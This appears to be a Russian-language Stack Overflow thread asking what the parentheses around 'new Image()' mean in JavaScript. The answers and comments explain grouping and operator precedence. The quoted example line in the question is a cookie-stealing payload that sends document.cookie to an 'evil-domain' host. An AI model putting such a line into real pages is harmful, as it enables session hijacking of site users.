# Что означает синтаксис () вокруг конструктора?

Tags: javascript, конструктор

```
(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
```

Answer (score 3, accepted):

Эти скобки здесь не обязательны. Следующие 2 строки идентичны:

```
new Image().src = '1.jpg'
(new Image()).src = '1.jpg'
```

Comment: ну дак, а обозначают то что?

Comment: @teran то что и обозначают в любом языке - установка приоритета операторов. `new` - тоже оператор

Comment: @ГончаровАлександр дак вот это и надо было в ответе написать, а не то что строки идентичны.

Answer (score 2):

Скобки - тоже оператор, и его поведение зависит от контекста.
В данном случае, он выступает в роли оператора группировки, указывая на то что сначала должен быть создан объект класса `Image,` а затем выполнен доступ к свойству `src`. Обратите внимание, что это происходит без занесения результата в переменную. Группировка определяет порядок выполнения, а также "ловит" возвращаемый результат выражения.

Запись со скобками **не** идентична записи без них. То что в каких-то случаях результат двусмысленного выражения без скобок соответствует ожидаемому - вовсе не означает что скобки "не нужны". Определение группировкой четкого приоритета в таких выражениях - не только рационально и практично (так как гарантирует порядок выполнения), но и является хорошим стилем написания кода.

Простейший пример:

```js
function SomeClass() {
  this.a = { data: 42 }; 
}

console.log('С группировкой:'); 
console.log((new SomeClass).a); 

console.log('Без группировки: '); 
console.log(new SomeClass.a);
```

В примере возникает ошибка - так как во втором случае, за операнд воспринято свойство `a` класса. Если подобное произойдет не в блоке `try`, скрипт прекратит свое выполнение. Такой результат явно не является желательным :)

Comment: у точки всё равно ассоциативность слева направо

Comment: @МихаилГригорьев, обратите внимание на пример, которым я дополнил ответ. И снова хочу акцентировать, что дело совсем не в том, "возникают ли подобные ситуации, и как часто". А в том, что любая неоднозначность кода - это потенциальная ошибка. Да, многие пишут по принципу скорость>качество и руководствуясь логикой "нуачо, работаит жи". Тем не менее, это не отменяет того факта что хороший код обладает строгостью и четкостью. И одним из способов достижения этих свойств, являются группировки. А какого качества писать код - это уже личный выбор каждого...

Comment: плюсанул, но `"TypeError: SomeClass.a is not a constructor",`

Comment: @teran, именно! Без группировки, интерпретатор воспринимает как операнд `SomeClass.a`, тогда как мы можем ожидать что это будет `SomeClass`. Результат - ошибка выполнения, и скрипт "ломается".

Comment: а, я че то тупанул и решил, что вы хотите создать объект другого класса (: